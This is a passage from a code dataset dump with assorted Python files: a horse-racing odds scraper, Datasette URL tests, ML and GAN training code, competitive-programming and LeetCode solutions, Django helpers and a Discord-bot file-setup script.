[ele['id'],ele['channels'],ele['offset'],ele['name']]))\n","sub_path":"conf2xlsx.py","file_name":"conf2xlsx.py","file_ext":"py","file_size_in_byte":1846,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"444913984","text":"from selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nimport lxml.html\nimport pandas as pd\n\nimport re\nimport datetime\nfrom time import sleep\nfrom argparse import ArgumentParser\n\n# クローリング・スクレイピングのメイン関数\ndef get_win_odds_list(open_date,output_mode,target_race_course,target_race_no):\n # pandasの標準出力の桁揃えオプション\n pd.set_option('display.unicode.east_asian_width', True)\n\n # 引数事前処理\n open_info = get_open_info(open_date) # 対象日付より開催情報を取得\n target_race_course_code = conversion_racecourse(target_race_course) # 競馬場名をコードに変換\n target_race_no_fill = str(target_race_no).zfill(2) # レースNoを2桁に変換\n\n # メイン処理\n for race_place in open_info:\n if race_place[\"race_course\"] == target_race_course_code:\n win_odds_url = format_win_odds_url(race_place[\"race_course\"],race_place[\"race_times\"],race_place[\"race_day\"],target_race_no_fill)\n sleep(1)\n # 出力モードSの場合は標準出力にprint、出力モードDの場合はDataFrame形式でreturn\n if output_mode == 'S':\n\n print(get_win_odds_df(win_odds_url))\n elif output_mode == 'D':\n return get_win_odds_df(win_odds_url)\n\n\n# 単勝オッズページを引数に指定して、そのページから馬番・馬名・単勝オッズを取得し、DataFrame形式で返す\ndef get_win_odds_df(url):\n # Seleniumを用いてクローリング\n driver = webdriver.PhantomJS() # PhamtomJSのWebDriverオブジェクトを作成する。\n driver.get(url) # オッズ表示画面を開く\n sleep(1) # 負荷分散の為のsleep\n root = lxml.html.fromstring(driver.page_source) # 検索結果を表示し、lxmlで解析準備\n\n # 辞書・リストの初期化\n win_odds_dict = {}\n horse_number_list = []\n horse_name_list = []\n tan_odds_list = []\n\n # 馬番・馬名・単勝オッズをスクレイピング\n for horse_number,horse_name,tan_odds in zip(root.cssselect('.umaban'),root.cssselect('.h_name'),root.cssselect('[axis^=oddsDataTan]')):\n horse_number_list.append(horse_number.text)\n horse_name_list.append(horse_name.text)\n 
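# The third selector yields the win-odds cell for the same horse row.\n        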
tan_odds_list.append(tan_odds.text)\n\n # スクレイピング結果を辞書からDataFrame形式に変換\n win_odds_dict[\"horse_number\"] = horse_number_list\n win_odds_dict[\"horse_name\"] = horse_name_list\n win_odds_dict[\"tan_odds\"] = tan_odds_list\n win_odds_df = pd.DataFrame(win_odds_dict,columns=['horse_number', 'horse_name', 'tan_odds'])\n\n return win_odds_df\n\n\n# 単勝オッズ取得対象ページのURLを整形する\ndef format_win_odds_url(race_course,race_times,race_day,race_no):\n win_odds_url_template = \"http://race.netkeiba.com/?pid=odds&id=p\"\n year = datetime.date.today().year\n\n win_odds_url = win_odds_url_template + str(year) + str(race_course) + str(race_times) + str(race_day) + str(race_no)\n\n return win_odds_url\n\n# 引数に指定したmmdd形式の日付で開催されるレースの開催情報を取得しリストで返す\ndef get_open_info(mmdd):\n race_list_url_template = \"http://race.netkeiba.com/?pid=race_list&id=p\"\n race_list_url = race_list_url_template + mmdd\n\n open_info_list = []\n\n # スクレイピング処理\n driver = webdriver.PhantomJS()\n driver.get(race_list_url)\n root = lxml.html.fromstring(driver.page_source)\n for open_info in root.cssselect('.kaisaidata'):\n open_info_dict = {}\n m = re.match(r\"(\\d+)回(..)(\\d+)日目\", open_info.text)\n open_info_dict[\"race_times\"] = m.group(1).zfill(2) # 開催回を2桁に整形\n open_info_dict[\"race_course\"] = conversion_racecourse(m.group(2)) # 開催競馬場をコード変換\n open_info_dict[\"race_day\"] = m.group(3).zfill(2) # 開催日を2桁に整形\n open_info_list.append(open_info_dict)\n\n '''\n スクレイピング結果\n [\n {'race_course': '04', 'race_day': '10', 'race_times': '02'},\n {'race_course': '10', 'race_day': '10', 'race_times': '02'},\n {'race_course': '01', 'race_day': '04', 'race_times': '02'}\n ]\n '''\n\n return open_info_list\n\n# 競馬場から2桁の競馬場コードへの変換関数\ndef conversion_racecourse(rc_name):\n rc_code = \"\"\n\n if rc_name == \"札幌\":\n rc_code = \"01\"\n elif rc_name == \"函館\":\n rc_code = \"02\"\n elif rc_name == \"福島\":\n rc_code = \"03\"\n elif rc_name == \"新潟\":\n rc_code = \"04\"\n elif rc_name == \"東京\":\n rc_code = \"05\"\n elif rc_name == \"中山\":\n rc_code = \"06\"\n elif rc_name == \"中京\":\n rc_code = \"07\"\n elif rc_name == \"京都\":\n rc_code = \"08\"\n elif rc_name == \"阪神\":\n rc_code = \"09\"\n elif rc_name == \"小倉\":\n rc_code = \"10\"\n\n return rc_code\n\n\nif __name__ == '__main__':\n # 引数処理\n parser = ArgumentParser(description='Process some integers.')\n ## 日付(必須)\n parser.add_argument('-d','--date', help='date(mmdd)', required=True)\n ## 競馬場名(必須・入力値制限)\n parser.add_argument('-c','--race_course', help='Race Course',choices=['札幌','函館','福島','新潟','東京','中山','中京','京都','阪神','小倉'],required=True)\n ## レース番号(任意・デフォルト11・入力値制限)\n parser.add_argument('-n','--race_no', help='Race No',default=11, type=int, choices=range(1, 13))\n ## 出力モード(任意・デフォルト値S・入力値制限)\n parser.add_argument('-m','--output_mode', help='OutputMode S:stdout D:dataframe',default='S',choices=['S','D'])\n\n args = parser.parse_args()\n\n # 引数で指定された情報を変数に格納\n open_date = args.date # 開催情報をクローリングしたい日付を格納\n output_mode = args.output_mode # アウトプットモードを格納\n target_race_course = args.race_course # 指定した競馬場名を格納\n target_race_no = args.race_no # 指定したレース番号を格納\n\n # クローリング・スクレイピング実行\n get_win_odds_list(open_date,output_mode,target_race_course,target_race_no)\n","sub_path":"scraper/get_win_odds.py","file_name":"get_win_odds.py","file_ext":"py","file_size_in_byte":6627,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"556712009","text":"from datasette.app import Datasette\nfrom .fixtures import app_client_with_hash\nimport pytest\n\n\n@pytest.fixture(scope=\"module\")\ndef 
ds():\n return Datasette([], memory=True)\n\n\n@pytest.mark.parametrize(\n \"base_url,path,expected\",\n [\n (\"/\", \"/\", \"/\"),\n (\"/\", \"/foo\", \"/foo\"),\n (\"/prefix/\", \"/\", \"/prefix/\"),\n (\"/prefix/\", \"/foo\", \"/prefix/foo\"),\n (\"/prefix/\", \"foo\", \"/prefix/foo\"),\n ],\n)\ndef test_path(ds, base_url, path, expected):\n ds._config[\"base_url\"] = base_url\n assert ds.urls.path(path) == expected\n\n\n@pytest.mark.parametrize(\n \"base_url,expected\",\n [\n (\"/\", \"/\"),\n (\"/prefix/\", \"/prefix/\"),\n ],\n)\ndef test_instance(ds, base_url, expected):\n ds._config[\"base_url\"] = base_url\n assert ds.urls.instance() == expected\n\n\n@pytest.mark.parametrize(\n \"base_url,file,expected\",\n [\n (\"/\", \"foo.js\", \"/-/static/foo.js\"),\n (\"/prefix/\", \"foo.js\", \"/prefix/-/static/foo.js\"),\n ],\n)\ndef test_static(ds, base_url, file, expected):\n ds._config[\"base_url\"] = base_url\n assert ds.urls.static(file) == expected\n\n\n@pytest.mark.parametrize(\n \"base_url,plugin,file,expected\",\n [\n (\n \"/\",\n \"datasette_cluster_map\",\n \"datasette-cluster-map.js\",\n \"/-/static-plugins/datasette_cluster_map/datasette-cluster-map.js\",\n ),\n (\n \"/prefix/\",\n \"datasette_cluster_map\",\n \"datasette-cluster-map.js\",\n \"/prefix/-/static-plugins/datasette_cluster_map/datasette-cluster-map.js\",\n ),\n ],\n)\ndef test_static_plugins(ds, base_url, plugin, file, expected):\n ds._config[\"base_url\"] = base_url\n assert ds.urls.static_plugins(plugin, file) == expected\n\n\n@pytest.mark.parametrize(\n \"base_url,expected\",\n [\n (\"/\", \"/-/logout\"),\n (\"/prefix/\", \"/prefix/-/logout\"),\n ],\n)\ndef test_logout(ds, base_url, expected):\n ds._config[\"base_url\"] = base_url\n assert ds.urls.logout() == expected\n\n\n@pytest.mark.parametrize(\n \"base_url,expected\",\n [\n (\"/\", \"/:memory:\"),\n (\"/prefix/\", \"/prefix/:memory:\"),\n ],\n)\ndef test_database(ds, base_url, expected):\n ds._config[\"base_url\"] = base_url\n assert ds.urls.database(\":memory:\") == expected\n # Do table and query while we are here\n assert ds.urls.table(\":memory:\", \"name\") == expected + \"/name\"\n assert ds.urls.query(\":memory:\", \"name\") == expected + \"/name\"\n\n\n@pytest.mark.parametrize(\"base_url\", [\"/\", \"/prefix/\"])\ndef test_database_hashed(app_client_with_hash, base_url):\n ds = app_client_with_hash.ds\n original_base_url = ds._config[\"base_url\"]\n try:\n ds._config[\"base_url\"] = base_url\n db_hash = ds.get_database(\"fixtures\").hash\n assert len(db_hash) == 64\n expected = \"{}fixtures-{}\".format(base_url, db_hash[:7])\n assert ds.urls.database(\"fixtures\") == expected\n assert ds.urls.table(\"fixtures\", \"name\") == expected + \"/name\"\n assert ds.urls.query(\"fixtures\", \"name\") == expected + \"/name\"\n finally:\n # Reset this since fixture is shared with other tests\n ds._config[\"base_url\"] = original_base_url\n","sub_path":"tests/test_internals_urls.py","file_name":"test_internals_urls.py","file_ext":"py","file_size_in_byte":3179,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"472153870","text":"from model_seq2vec import *\nfrom model_ed import *\nfrom model_tp import *\nimport sys\nimport yaml\n\ndef main():\n \"\"\"\n Launches model training or inference\n \"\"\"\n ds_yaml = sys.argv[1]\n model_yaml = sys.argv[2]\n with open(ds_yaml+\".yaml\", 'r') as f:\n param = yaml.safe_load(f)\n with open(model_yaml+\".yaml\", 'r') as f:\n hparam = yaml.safe_load(f)\n if 
hparam[\"model_type\"] == 0 or hparam[\"model_type\"] == 1:\n ds = DatasetTsagi(param[\"tsagi_directory\"], param[\"tsagi_file\"], param[\"input_type\"], param[\"metric_type\"])\n ds.load(input_struct=param[\"input_struct\"],\n nb_steps=param[\"nb_steps\"],\n apply_smooth=param[\"apply_smooth\"],\n log_thr=param[\"log_thr\"],\n criterion=param[\"criterion\"],\n rescale=param[\"rescale\"],\n apply_yolo=param[\"apply_yolo\"],\n cong_thr=param[\"cong_thr\"],\n eps=param[\"eps\"],\n min_samples=param[\"min_samples\"],\n apply_binary=param[\"apply_binary\"],\n percentile=param[\"percentile\"])\n if hparam[\"model_type\"] == 0:\n model = ModelSeq2Vec(dataset=ds,\n name=hparam[\"name\"],\n layers_list=hparam[\"layers_list\"],\n directory=hparam[\"directory\"],\n input_seq_len = hparam[\"input_dim\"],\n output_seq_len = hparam[\"output_dim\"],\n batch_size = hparam[\"batch_size\"],\n epochs = hparam[\"epochs\"],\n learning_rate = hparam[\"learning_rate\"],\n beta_1 = hparam[\"beta_1\"],\n beta_2 = hparam[\"beta_2\"],\n loss = hparam[\"loss\"],\n l2_lambd = hparam[\"l2_lambd\"],\n nb_splits = hparam[\"nb_splits\"],\n train_val_split = hparam[\"train_val_split\"],\n index_file = hparam[\"index_file\"])\n elif hparam[\"model_type\"] == 1:\n model = ModelEncoderDecoder(dataset=ds,\n name=hparam[\"name\"],\n layers_list=hparam[\"layers_list\"],\n directory=hparam[\"directory\"],\n input_seq_len = hparam[\"input_dim\"],\n output_seq_len = hparam[\"output_dim\"],\n batch_size = hparam[\"batch_size\"],\n epochs = hparam[\"epochs\"],\n learning_rate = hparam[\"learning_rate\"],\n beta_1 = hparam[\"beta_1\"],\n beta_2 = hparam[\"beta_2\"],\n loss = hparam[\"loss\"],\n l2_lambd = hparam[\"l2_lambd\"],\n nb_splits = hparam[\"nb_splits\"],\n train_val_split = hparam[\"train_val_split\"],\n index_file = hparam[\"index_file\"])\n elif hparam[\"model_type\"] == 2:\n ds = DatasetTraj(trajs_directory=param[\"trajs_directory\"], plns_directory=param[\"plns_directory\"], weather_directory=param[\"weather_directory\"], input_type=param[\"input_type\"])\n model = ModelTP(dataset=ds,\n name=hparam[\"name\"],\n layers_list=hparam[\"layers_list\"],\n directory=hparam[\"directory\"],\n batch_size = hparam[\"batch_size\"],\n epochs = hparam[\"epochs\"],\n learning_rate = hparam[\"learning_rate\"],\n beta_1 = hparam[\"beta_1\"],\n beta_2 = hparam[\"beta_2\"],\n loss = hparam[\"loss\"],\n l2_lambd = hparam[\"l2_lambd\"],\n nb_splits = hparam[\"nb_splits\"],\n train_val_split = hparam[\"train_val_split\"],\n index_file = hparam[\"index_file\"],\n k_mixture = hparam[\"k_mixture\"])\n if hparam[\"train\"]:\n model.training()\n else:\n if hparam[\"model_type\"] == 0 or hparam[\"model_type\"] == 1:\n model.prediction(hparam[\"use_val\"], hparam[\"plot_type\"], hparam[\"pred_dim\"])\n if hparam[\"model_type\"] == 2:\n model.prediction(hparam[\"use_val\"], hparam[\"pred_dim\"])\n plt.show()\n\nif __name__ == '__main__':\n main()","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4555,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"574545702","text":"import tensorflow as tf\n\n#D- is for Discriminator\n#G is for Generator\ncross_entropy = tf.keras.losses.BinaryCrossentropy(from_logits=True) #no sigmoid is activated at D\n\n@tf.function\ndef discriminator_loss(D,G,x,z):\n real_output=D(x,training=True)\n fake_output=D(G(z,training=True),training=True)\n real_loss = cross_entropy(tf.ones_like(real_output), real_output)\n fake_loss = 
cross_entropy(tf.zeros_like(fake_output), fake_output)\n total_loss = real_loss + fake_loss\n return total_loss\n# L_to_Maximize=tf.reduce_mean(tf.math.log(D(x))+tf.math.log(1-D(G(z))))\n# L_to_Minimize=-L_to_Maximize # maximize L means minimize -L\n# return L_to_Minimize\n\n@tf.function\ndef generator_loss(D,G,z):\n fake_output=D(G(z,training=True),training=True)\n return cross_entropy(tf.ones_like(fake_output), fake_output)\n# L_to_Minimize=tf.reduce_mean(tf.math.log(1-D(G(z))))\n# return L_to_Minimize\n# L_to_Maximize=tf.reduce_mean(tf.math.log(D(G(z)))) # for inner (0->1) cost goto (-inf ,0)\n# L_to_Minimize=-L_to_Maximize # maximize L means minimize -L\n# return L_to_Minimize","sub_path":"Vanilla-GAN/library/losses.py","file_name":"losses.py","file_ext":"py","file_size_in_byte":1107,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"53598944","text":"# https://atcoder.jp/contests/abc128/tasks/abc128_c\nn, m = map(int, input().split())\nks = [list(map(int, input().split())) for _ in range(m)]\np = list(map(int, input().split()))\n\ns = []\nans = 0\nfor i in range(m):\n k = ks[i][0]\n l = [ks[i][j] for j in range(1, k+1)]\n s.append(l)\n\nswh = [False for _ in range(n)]\nfor i in range(2 ** n):\n #print('######')\n flag = True\n # スイッチの状態\n for j in range(n):\n if ((i >> j) & 1): swh[j] = True\n else: swh[j] = False\n \n # 現在の状態での各電球の点灯をチェック \n for j in range(m):\n #print('電球{}'.format(j))\n judge = [swh[si-1] for si in s[j]]\n #print(judge)\n if judge.count(True) % 2 != p[j]:\n flag = False\n break\n \n if flag: ans += 1\n #print('ans = {}'.format(ans))\n \nprint(ans)","sub_path":"c/abc128c.py","file_name":"abc128c.py","file_ext":"py","file_size_in_byte":822,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"509498410","text":"from django import template\nfrom django.core.urlresolvers import reverse\n\nregister = template.Library()\n\n\n@register.simple_tag(takes_context=True)\ndef navbar_element(context, title, url_name):\n \"\"\"\n Insert Bootstrap's `
    Insert Bootstrap's `<li><a>...</a></li>` with specific classes and\n    accessibility elements. This tag takes a URL name (with no arguments) that\n    is later reversed into proper URL.\n    \"\"\"\n    url = reverse(url_name)\n    return navbar_element_url(context, title, url)\n\n
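# Template usage (illustrative names): {% navbar_element \"Home\" \"index\" %} or {% navbar_element_url \"Home\" \"/\" %}\n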
\n@register.simple_tag(takes_context=True)\ndef navbar_element_url(context, title, url):\n    \"\"\"\n    Insert Bootstrap's `<li><a>...</a></li>` with specific classes and\n    accessibility elements. This tag takes a pre-made URL as an argument.\n    \"\"\"\n    request = context['request']\n\n    active = \"\"\n    screen_reader = \"\"\n\n    if request.path == url:\n        active = 'class=\"active\"'\n        screen_reader = '(active)'\n
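    # Bootstrap marks the current nav item with class=\"active\"; the '(active)' text is extra context for screen readers\n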
    tmplt = '<li {0}><a href=\"{1}\">{2} {3}</a></li>'\n\n    return tmplt.format(active, url, title, screen_reader)\n","sub_path":"workshops/templatetags/navigation.py","file_name":"navigation.py","file_ext":"py","file_size_in_byte":1041,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"372839055","text":"'''\nNormal-equation method for multiple variables\n'''\nfrom sklearn.model_selection import train_test_split\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndata = pd.read_csv('Apple.csv')\n\nx = data.iloc[:,1:6].values\ny = data.iloc[:,-1].values\nno_train_ex = len(y)\n\ntemp = []\nfor d in x:\n    temp.append([d[0],d[1]])\ntemp2 = []\nfor d in y:\n    temp2.append([d])\n\n\n# X --- size = m x 2\nX = np.array(temp)\nY = np.array(temp2)\n\nx_train,x_test,y_train,y_test = train_test_split(X,Y,test_size = 0.1)\n\ntheta = np.linalg.inv(np.transpose(x_train)@x_train) @ np.transpose(x_train)@y_train\n\nfrom sklearn.linear_model import LinearRegression\nreg = LinearRegression()\nreg.fit(x_train,y_train)\n\n\nlib_pred = reg.predict(x_test)\nmath_pred = x_test@theta\n\ni=0\nlib_diff = 0\nmath_diff = 0\nwhile i 0 else mx.cpu()\n    \n    net = mlp(**setting['model_params'])\n    \n    net.initialize(init=mx.init.Xavier(), ctx=ctx, force_reinit=True)\n    net.hybridize(static_alloc=True, static_shape=True)\n    \n    trainer = gluon.Trainer(net.collect_params(), \n                            opt, setting['opt_params'])\n    \n    # metrics\n    train_acc = mx.metric.Accuracy()\n    loss_fn = gluon.loss.SoftmaxCrossEntropyLoss()\n    \n    est = estimator.Estimator(net=net, \n                              loss=loss_fn, \n                              metrics=train_acc, \n                              trainer=trainer, \n                              context=ctx)\n    \n    run = exp.start_logging(tags)\n    \n    try:\n        setting['commit_hash'] = run.git_commit()\n        run.save(setting, 'setting.json', mode='json')\n\n        checkpoint_handler = CheckpointHandler(model_dir=str(run.path),\n                                               model_prefix='model',\n                                               monitor=train_acc,\n                                               save_best=True,\n                                               max_checkpoints=0)\n        \n        record_handler = RecordHandler(file_name='log.pkl', \n                                       file_location=run.path)\n\n        # ignore warnings for nightly test on CI only\n        import warnings\n        with warnings.catch_warnings():\n            warnings.simplefilter(\"ignore\")\n\n            est.fit(train_data=train_dl, val_data=test_dl,\n                    epochs=num_epochs, event_handlers=[checkpoint_handler, record_handler])\n        \n    except Exception as e:\n        run.delete()\n        raise ValueError('error occurred and deleted run folder: {}'.format(e))\n    \n\nclass RecordHandler(TrainEnd, EpochEnd):\n    \"\"\"Handler that records the loss and metric values every epoch and dumps them to a pickle file\n    \n    pickle file: \n    {'train loss': [0.9, 0.8, ...], 'train acc': [...], ...}\n    \"\"\"\n    def __init__(self, file_name, file_location):\n        super(RecordHandler, self).__init__()\n        self.history = {}\n        self.file_path = file_location.joinpath(file_name)\n\n    def train_end(self, estimator, *args, **kwargs):\n        # Print all the losses at the end of training\n        print(\"Training ended\")\n        pd.to_pickle(self.history, self.file_path)\n    \n    def epoch_end(self, estimator, *args, **kwargs):\n        for metric in estimator.train_metrics:\n            name, val = metric.get()\n            self.history.setdefault(name, []).append(val)\n        \n        for metric in estimator.val_metrics:\n            name, val = metric.get()\n            self.history.setdefault(name, []).append(val)\n    ","sub_path":"utils/train_module.py","file_name":"train_module.py","file_ext":"py","file_size_in_byte":4196,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"2314204","text":"# leetcode 122:\r\n\r\n# algo: find a valley and the next peak, take that profit, and keep finding valleys and peaks this way to calculate profits\r\n
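# e.g. prices = [7, 1, 5, 3, 6, 4]: buy at 1, sell at 5, buy at 3, sell at 6 -> total profit (5 - 1) + (6 - 3) = 7\r\n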
class Solution:\r\n    def maxProfit(self, prices: List[int]) -> int:\r\n        if len(prices) == 0:\r\n            return 0\r\n        # variables\r\n        i = 0\r\n        valley = prices[0]\r\n        peak = prices[0]\r\n        max_profit = 0\r\n        while i < len(prices) - 1: # the last element is taken care of inside the while loop itself\r\n            while i < len(prices) - 1 and prices[i] >= prices[i + 1]: # case when we find a valley at i+1\r\n                i += 1\r\n            valley = prices[i] # i+1 in the while loop is i here\r\n            while i < len(prices) - 1 and prices[i] < prices[i + 1]: # case when we find a peak at i+1\r\n                i += 1\r\n            peak = prices[i]\r\n            max_profit += peak - valley # in this case peak and valley at the end become equal, which leads to adding zero\r\n        return max_profit\r\n\r\n\r\n# algo: two-pointer approach, keeping the low and high indices together in a tuple\r\n# for every stock we scan until we find a value greater than the bought value; if one is found we calculate the profit and keep scanning for the highest profit; if we encounter a value lower than the bought value after making some profit, we bank that profit and move on to buying the next stock\r\nclass Solution:\r\n    def maxProfit(self, prices: List[int]) -> int:\r\n        prof_final = 0\r\n        # edge case\r\n        if not (prices) or len(prices) <= 1:\r\n            return prof_final\r\n        # 2 pointers\r\n        low_high = (-1, -1)\r\n        # profit calculator\r\n        prof = 0\r\n        for i in range(1, len(prices), 1):\r\n            if prices[i] - prices[i - 1] >= 0:\r\n                if prof == 0: # case when profit has not been made with this stock yet\r\n                    low_high = (i - 1, i)\r\n                    prof = prices[i] - prices[i - 1]\r\n                else: # case when profit is already made with this stock\r\n                    low_high = (low_high[0], i)\r\n                    prof = prices[i] - prices[low_high[0]]\r\n            else: # case when a new stock is to be bought\r\n                low_high = (i, -1) # initiate low pointer\r\n                prof_final += prof # add the previously calculated profit to the final profit\r\n                prof = 0 # start with finding new profit on selling this stock\r\n        # final profit\r\n        prof_final += prof\r\n        return prof_final\r\n\r\n\r\n# best sol: the peaks and valleys are found by directly summing up the positive differences between adjacent prices\r\n\r\nclass Solution:\r\n    def maxProfit(self, prices: List[int]) -> int:\r\n        sum_sum = 0\r\n        if not (prices) or len(prices) <= 1:\r\n            return sum_sum\r\n        for i in range(1, len(prices), 1):\r\n            # print(i)\r\n            if prices[i] - prices[i - 1] > 0:\r\n                sum_sum += prices[i] - prices[i - 1]\r\n                # i += 1\r\n        return sum_sum\r\n","sub_path":"prob_129.py","file_name":"prob_129.py","file_ext":"py","file_size_in_byte":2991,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"213137913","text":"import os\r\nimport shutil\r\nimport openpyxl\r\nimport time\r\nfrom requests import get\r\nfrom PIL import Image, ImageDraw, ImageFont\r\n\r\n\r\ndef golden(userdirectory, user):\r\n    os.makedirs(userdirectory + \"chess/log\")\r\n    os.makedirs(userdirectory + \"chess/match\")\r\n    os.makedirs(userdirectory + \"economy/country\")\r\n    os.makedirs(userdirectory + \"end-to-end/log\")\r\n    os.makedirs(userdirectory + \"end-to-end/match\")\r\n    os.makedirs(userdirectory + \"go/log\")\r\n    os.makedirs(userdirectory + \"go/match\")\r\n    os.makedirs(userdirectory + \"gomoku/log\")\r\n    os.makedirs(userdirectory + \"gomoku/match\")\r\n    os.makedirs(userdirectory + \"korean-chess/log\")\r\n    os.makedirs(userdirectory + \"korean-chess/match\")\r\n    os.makedirs(userdirectory + \"reinforce\")\r\n    os.makedirs(userdirectory + \"shogi/log\")\r\n    os.makedirs(userdirectory + 
\"shogi/match\")\r\n f = open(userdirectory + \"chess/log/elo.txt\", 'w')\r\n f.write(\"1000\")\r\n f.close()\r\n f = open(userdirectory + \"chess/log/lose.txt\", 'w')\r\n f.write(\"0\")\r\n f.close()\r\n f = open(userdirectory + \"chess/log/streak.txt\", 'w')\r\n f.write(\"0\")\r\n f.close()\r\n f = open(userdirectory + \"chess/log/win.txt\", 'w')\r\n f.write(\"0\")\r\n f.close()\r\n f = open(userdirectory + \"end-to-end/log/elo.txt\", 'w')\r\n f.write(\"1000\")\r\n f.close()\r\n f = open(userdirectory + \"end-to-end/log/lose.txt\", 'w')\r\n f.write(\"0\")\r\n f.close()\r\n f = open(userdirectory + \"end-to-end/log/streak.txt\", 'w')\r\n f.write(\"0\")\r\n f.close()\r\n f = open(userdirectory + \"end-to-end/log/win.txt\", 'w')\r\n f.write(\"0\")\r\n f.close()\r\n f = open(userdirectory + \"go/log/elo.txt\", 'w')\r\n f.write(\"1000\")\r\n f.close()\r\n f = open(userdirectory + \"go/log/lose.txt\", 'w')\r\n f.write(\"0\")\r\n f.close()\r\n f = open(userdirectory + \"go/log/streak.txt\", 'w')\r\n f.write(\"0\")\r\n f.close()\r\n f = open(userdirectory + \"go/log/win.txt\", 'w')\r\n f.write(\"0\")\r\n f.close()\r\n f = open(userdirectory + \"gomoku/log/elo.txt\", 'w')\r\n f.write(\"1000\")\r\n f.close()\r\n f = open(userdirectory + \"gomoku/log/lose.txt\", 'w')\r\n f.write(\"0\")\r\n f.close()\r\n f = open(userdirectory + \"gomoku/log/streak.txt\", 'w')\r\n f.write(\"0\")\r\n f.close()\r\n f = open(userdirectory + \"gomoku/log/win.txt\", 'w')\r\n f.write(\"0\")\r\n f.close()\r\n f = open(userdirectory + \"korean-chess/log/elo.txt\", 'w')\r\n f.write(\"1000\")\r\n f.close()\r\n f = open(userdirectory + \"korean-chess/log/lose.txt\", 'w')\r\n f.write(\"0\")\r\n f.close()\r\n f = open(userdirectory + \"korean-chess/log/streak.txt\", 'w')\r\n f.write(\"0\")\r\n f.close()\r\n f = open(userdirectory + \"korean-chess/log/win.txt\", 'w')\r\n f.write(\"0\")\r\n f.close()\r\n f = open(userdirectory + \"shogi/log/elo.txt\", 'w')\r\n f.write(\"1000\")\r\n f.close()\r\n f = open(userdirectory + \"shogi/log/lose.txt\", 'w')\r\n f.write(\"0\")\r\n f.close()\r\n f = open(userdirectory + \"shogi/log/streak.txt\", 'w')\r\n f.write(\"0\")\r\n f.close()\r\n f = open(userdirectory + \"shogi/log/win.txt\", 'w')\r\n f.write(\"0\")\r\n f.close()\r\n f = open(userdirectory + \"language.txt\", 'w')\r\n f.write(\"English(Default)\")\r\n f.close()\r\n f = open(userdirectory + \"economy/cash.txt\", 'w')\r\n f.write(\"0\")\r\n f.close()\r\n f = open(userdirectory + \"economy/bank.txt\", 'w')\r\n f.write(\"0\")\r\n f.close()\r\n f = open(userdirectory + \"economy/bank_cool.txt\", 'w')\r\n f.write(\"0\")\r\n f.close()\r\n f = open(userdirectory + \"economy/money.txt\", 'w')\r\n f.write(\"0\")\r\n f.close()\r\n\r\n\r\ndef silvy(leader, name):\r\n os.makedirs(\"lib/utils/country/\" + leader)\r\n shutil.copy(\"lib/libs/country/country_sample.xlsx\", \"country_sample.xlsx\")\r\n f = openpyxl.load_workbook(\"country_sample.xlsx\")\r\n sheet = f.active\r\n sheet[\"L1\"].value = name\r\n f.save(\"informations.xlsx\")\r\n os.remove(\"country_sample.xlsx\")\r\n shutil.move(\"informations.xlsx\", \"lib/utils/country/\" + leader + \"/informations.xlsx\")\r\n shutil.copy(\"lib/libs/country/units.xlsx\", \"lib/utils/country/\" + leader + \"/units.xlsx\")\r\n\r\n\r\ndef bronse(id):\r\n directory = \"lib/utils/server/\" + str(id) + \"/\"\r\n os.makedirs(directory + \"levels\")\r\n os.makedirs(directory + \"setting/custom\")\r\n os.makedirs(directory + \"setting/forbid\")\r\n f = open(directory + \"setting/custom/leveling_message.txt\", 
'w')\r\n f.write(\"None\")\r\n f.close()\r\n\r\n\r\ndef level_card(url, name, rank, level, exp):\r\n with open(name + \".png\", \"wb\") as file:\r\n response = get(url)\r\n file.write(response.content)\r\n image = Image.open(name + '.png')\r\n resize_image = image.resize((320, 320))\r\n resize_image.save(name + '.png')\r\n profile_image = Image.open(name + \".png\")\r\n sample_image = Image.open(\"lib/libs/level/sample_layer1.png\")\r\n sample_image2 = Image.open(\"lib/libs/level/sample_layer2.png\")\r\n font_folder = \"lib/libs/Font/\"\r\n font = ImageFont.truetype(os.path.join(font_folder, 'Qwref.ttf'), 50)\r\n draw = ImageDraw.Draw(sample_image)\r\n sample_image.paste(profile_image, (50, 140))\r\n draw.text((475, 105), name, fill=(83, 78, 95, 255), font=font)\r\n draw.text((500, 235), level, fill=(83, 78, 95, 255), font=font)\r\n draw.text((780, 235), rank, fill=(83, 78, 95, 255), font=font)\r\n draw.text((475, 355), exp, fill=(83, 78, 95, 255), font=font)\r\n final1 = Image.new(\"RGBA\", sample_image.size)\r\n final1.paste(sample_image, (0, 0), sample_image)\r\n final1.paste(sample_image2, (0, 0), sample_image2)\r\n final2 = Image.new(\"RGBA\", sample_image.size)\r\n final2 = Image.alpha_composite(final2, sample_image)\r\n final2 = Image.alpha_composite(final2, sample_image2)\r\n final2.save(name + \".png\")\r\n\r\n\r\nasync def peopl():\r\n f = open(\"Last update\", 'r')\r\n t = time.time()\r\n tim = f.read()\r\n f.close()\r\n if t > int(tim) + 3600:\r\n f = open(\"Last update\", 'w')\r\n f.write(str(t))\r\n f.close()\r\n","sub_path":"accounty.py","file_name":"accounty.py","file_ext":"py","file_size_in_byte":6500,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"624363896","text":"from django.conf.urls import patterns, include, url\r\nfrom django.conf import settings\r\nfrom django.contrib import admin\r\n\r\nadmin.autodiscover()\r\n\r\nurlpatterns = patterns('',\r\n url(r'^media/(?P.*)$', 'django.views.static.serve', { 'document_root': settings.MEDIA_ROOT, }),\r\n url(r'^static/(?P.*)$', 'django.views.static.serve', { 'document_root': settings.STATIC_ROOT, }), \r\n url(r'^admin/', include(admin.site.urls)),\r\n \r\n url(r'^$', 